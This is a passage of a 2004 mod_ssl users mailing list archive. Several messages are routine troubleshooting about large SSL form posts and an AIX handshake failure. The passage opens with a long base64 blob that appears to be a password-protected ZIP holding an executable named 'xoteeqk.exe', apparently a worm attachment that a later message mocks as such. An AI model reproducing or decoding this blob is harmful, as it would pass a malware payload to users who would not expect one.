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
eGVQSwUGAAAAAAEAAQA5AAAAU1cAAAAA

----------iqfhhmdnpjecwuigyhkd--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 29 19:20:15 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 79B1AA8A4B; Mon, 29 Mar 2004 19:20:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from indigo.quadrant.net (indigo.quadrant.net [207.195.92.9])
	by master.modssl.org (Postfix) with ESMTP id 1CA61A8A49
	for ; Mon, 29 Mar 2004 19:19:58 +0200 (CEST)
Received: from [192.168.100.122] (production.marketingden.com [204.83.38.3])
	by indigo.quadrant.net (8.12.10/8.12.10) with ESMTP id i2THJpGv028156
	for ; Mon, 29 Mar 2004 11:19:52 -0600 (CST)
User-Agent: Microsoft-Entourage/9.0.2.4011
Date: Mon, 29 Mar 2004 11:19:34 -0600
Subject: Re: Document
From: James Hastings-Trew 
To: 
Message-ID: 
In-Reply-To: 
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Hastings-Trew 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hasn't the witty worm destroyed this idiot's computer yet?

> Here  is the file.
> In  order to read the attach you have to use the  following password:
 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 29 21:38:11 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DF265A89A3; Mon, 29 Mar 2004 21:38:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web10404.mail.yahoo.com (web10404.mail.yahoo.com [216.136.130.96])
	by master.modssl.org (Postfix) with SMTP id 2BBB5A8938
	for ; Mon, 29 Mar 2004 21:37:55 +0200 (CEST)
Message-ID: <20040329193742.80788.qmail@web10404.mail.yahoo.com>
Received: from [63.78.169.2] by web10404.mail.yahoo.com via HTTP; Mon, 29 Mar 2004 11:37:42 PST
Date: Mon, 29 Mar 2004 11:37:42 -0800 (PST)
From: chloe smith 
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: chloe smith 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have a web app that I'm trying to run on Apache
1.3.27, mod_ssl 2.8.11, mod_jk and Tomcat 4.1.27. 
Everything works when I run it over a non-secure port
(Apache 1.3.27 + mod_jk + Tomcat 4.1.27).  When I try
to use mod_ssl over port 443, one of the pages with a
fairly large form does not work.  When posted, the
browser hangs and I get an i/o error in the ssl engine
log and an "invalid method" error in the ssl request
log.  If I comment out some of the form elements
(doesn't matter which ones), the page works.  Also, if
I use the 'get' form method, the page works.

Is there a setting for mod_ssl that limits post data? 
Or a cache size that I need to increase?   

TIA,
Chloe

 


__________________________________
Do you Yahoo!?
Yahoo! Finance Tax Center - File online. File on time.
http://taxes.yahoo.com/filing.html
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 29 22:03:53 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D6941A8A51; Mon, 29 Mar 2004 22:03:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web10408.mail.yahoo.com (web10408.mail.yahoo.com [216.136.130.110])
	by master.modssl.org (Postfix) with SMTP id 85EA9A8943
	for ; Mon, 29 Mar 2004 22:03:36 +0200 (CEST)
Message-ID: <20040329200326.22432.qmail@web10408.mail.yahoo.com>
Received: from [63.78.169.2] by web10408.mail.yahoo.com via HTTP; Mon, 29 Mar 2004 12:03:26 PST
Date: Mon, 29 Mar 2004 12:03:26 -0800 (PST)
From: chloe smith 
Subject: problem posting large form
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: chloe smith 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have a web app that I'm trying to run on Apache
1.3.27, mod_ssl 2.8.11, mod_jk and Tomcat 4.1.27. 
Everything works when I run it over a non-secure port
(Apache 1.3.27 + mod_jk + Tomcat 4.1.27).  When I try
to use mod_ssl over port 443, one of the pages with a
fairly large form does not work.  When posted, the
browser hangs and I get an i/o error in the ssl engine
log and an "invalid method" error in the ssl request
log.  If I comment out some of the form elements
(doesn't matter which ones), the page works.  Also, if
I use the 'get' form method, the page works.

Is there a setting for mod_ssl that limits post data? 
Or a cache size that I need to increase?   

TIA,
Chloe

 


__________________________________
Do you Yahoo!?
Yahoo! Finance Tax Center - File online. File on time.
http://taxes.yahoo.com/filing.html
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 29 22:40:23 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1913FA89A3; Mon, 29 Mar 2004 22:40:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp1.fiu.edu (spn7.fiu.edu [131.94.57.9])
	by master.modssl.org (Postfix) with ESMTP id 9AA26A8943
	for ; Mon, 29 Mar 2004 22:40:06 +0200 (CEST)
To: modssl-users@modssl.org
Subject: seg fault in apache in AIX
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 5.0.10  March 22, 2002
Message-ID: 
From: chuck@fiu.edu
Date: Mon, 29 Mar 2004 15:39:06 -0500
X-MIMETrack: Serialize by Router on smtp1/FIU(Release 5.0.12HF406 | October 1, 2003) at
 03/29/2004 03:39:43 PM,
	Serialize complete at 03/29/2004 03:39:43 PM
Content-Type: text/plain; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: chuck@fiu.edu
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi! 
I'm getting the following output from a test of https on my apache server 
using modssl.  I can't easily rebuild it.  I'm hoping someone has an idea 
how to get more info without recompiling the server... 

CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 2006ACC8 [2006AD18] (130 bytes => 130 (0x82))
0000 - 80 80 01 03 01 00 57 00-00 00 20 00 00 16 00 00   ......W... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 07 00 00 05   .........f......
0020 - 00 00 04 05 00 80 03 00-80 01 00 80 08 00 80 00   ................
0030 - 00 65 00 00 64 00 00 63-00 00 62 00 00 61 00 00   .e..d..c..b..a..
0040 - 60 00 00 15 00 00 12 00-00 09 06 00 40 00 00 14   `...........@...
0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02   ................
0060 - 00 80 d3 cf b9 88 18 5b-8c 9c 19 3d a9 37 89 2e   .......[...=.7..
0070 - 54 11 87 da a6 34 7b f9-09 00 2e 38 eb 72 6b aa   T....4{....8.rk.
0080 - f2 f7                                             ..
SSL_connect:SSLv2/v3 write client hello A
read from 2006ACC8 [20070278] (7 bytes => 0 (0x0))
207398:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake 
failure:s23_lib.c:216:



Compiled-in modules:
  http_core.c
  mod_env.c
  mod_log_config.c
  mod_mime.c
  mod_negotiation.c
  mod_status.c
  mod_include.c
  mod_autoindex.c
  mod_dir.c
  mod_cgi.c
  mod_asis.c
  mod_imap.c
  mod_actions.c
  mod_userdir.c
  mod_alias.c
  mod_access.c
  mod_auth.c
  mod_setenvif.c
  mod_ssl.c
  mod_auth_kerb.c
suexec: disabled; invalid wrapper /home/httpd/bin/

8-)
TIA
Chuck Lyon
UTS Enterprise Systems
University Park PC 417A
Florida International University
Miami, FL  33199 PH (305) 348-2912
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 29 22:44:27 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 64019A8A51; Mon, 29 Mar 2004 22:44:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (ares.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id B6979A8A49
	for ; Mon, 29 Mar 2004 22:44:10 +0200 (CEST)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.10/8.12.10/UVACS-2004022400) with ESMTP id i2TKi1Q9020221;
	Mon, 29 Mar 2004 15:44:01 -0500 (EST)
Date: Mon, 29 Mar 2004 15:44:01 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: chuck@fiu.edu
Cc: modssl-users@modssl.org
Subject: Re: seg fault in apache in AIX
In-Reply-To: 
Message-ID: 
References: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, 29 Mar 2004 chuck@fiu.edu wrote:

> I'm getting the following output from a test of https on my apache server
> using modssl.  I can't easily rebuild it.  I'm hoping someone has an idea
> how to get more info without recompiling the server...

You're gonna have to give us more than that.  :)

For starters:

 - Apache version, mod_ssl version, OpenSSL version?
 - session cache settings?
 - using client certificates or revocation lists?

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 29 23:58:42 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9E867A89A3; Mon, 29 Mar 2004 23:58:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (ares.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id 1176BA8938
	for ; Mon, 29 Mar 2004 23:58:26 +0200 (CEST)
Received: from cobra.cs.Virginia.EDU (cobra.cs.Virginia.EDU [128.143.137.16])
	by ares.cs.Virginia.EDU (8.12.10/8.12.10/UVACS-2004022400) with ESMTP id i2TLwDQ9006064;
	Mon, 29 Mar 2004 16:58:14 -0500 (EST)
Date: Mon, 29 Mar 2004 16:58:13 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: chuck@fiu.edu
Cc: modssl-users@modssl.org
Subject: Re: seg fault in apache in AIX
In-Reply-To: 
Message-ID: 
References: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
